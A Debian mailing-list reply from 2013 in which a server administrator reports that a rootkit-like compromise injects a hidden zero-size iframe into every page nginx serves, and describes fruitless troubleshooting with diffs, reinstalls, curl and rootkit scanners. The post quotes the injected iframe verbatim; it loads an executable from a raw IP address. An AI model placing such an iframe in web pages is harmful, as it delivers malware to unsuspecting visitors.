Re: debian wheezy i386 nginx iframe rootkit
On Thu, Sep 12, 2013 at 09:13:46AM +0900, Joel Rees wrote:
> On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <frankb@efball.com> wrote:
> > Last fall there was a debian 64-bit / nginx rootkit going around,
> > now I've been hit with what sounds similar but on 32-bit wheezy.
> >
> > All files served by nginx have this line inserted at the top:
> >
> > <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>
> >
> > I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
> > Debian Wheezy i386 machine in a safe environment and did a diff -r. No
> > difference.
> >
> > No ismod line in /etc/rc.local
> >
> > I haven't been able to find anything. Googling doesn't show anything
> > similar for debian wheezy i386, only sqeeze 64-bit.
> >
> > I was using nginx-light from dotdeb.org. I uninstalled nginx and tried
> > the nginx-light from debian wheezy but it made no difference.
>
> Just out of curiosity, did you back up nginx and check it as well?
>
> --
> Joel Rees
No, I just uninstalled nginx from dotdeb and installed from Debian.
The webpages are all static and remain unchanged, the nginx config files
are OK. The new line is added by some process I can't find.
The lynx webrowser shows this as the first line of the webpages:
IFRAME: http://122.226.137.123:1111/yixi.exe
It also appears in downloads using wget.
"view source" in firefox or chrome show nothing amiss.
It only appears on IPv4, not IPv6.
I do not have php installed.
The http header is completely different:
curl -I shows this:
HTTP/1.1 200 OK
Content-Type: text/html; charset=en_US.UTF-8
Content-Length: 3634
When it should look more like this:
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 11 Sep 2013 23:39:48 GMT
Content-Type: text/html; charset=en_US.UTF-8
Content-Length: 3291
Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5101a7f4-cdb"
Accept-Ranges: bytes
I installed chkrootkit, rkhunter, unhide.rb and they found nothing.
E Frank Ball frankb@efball.com
Reply to: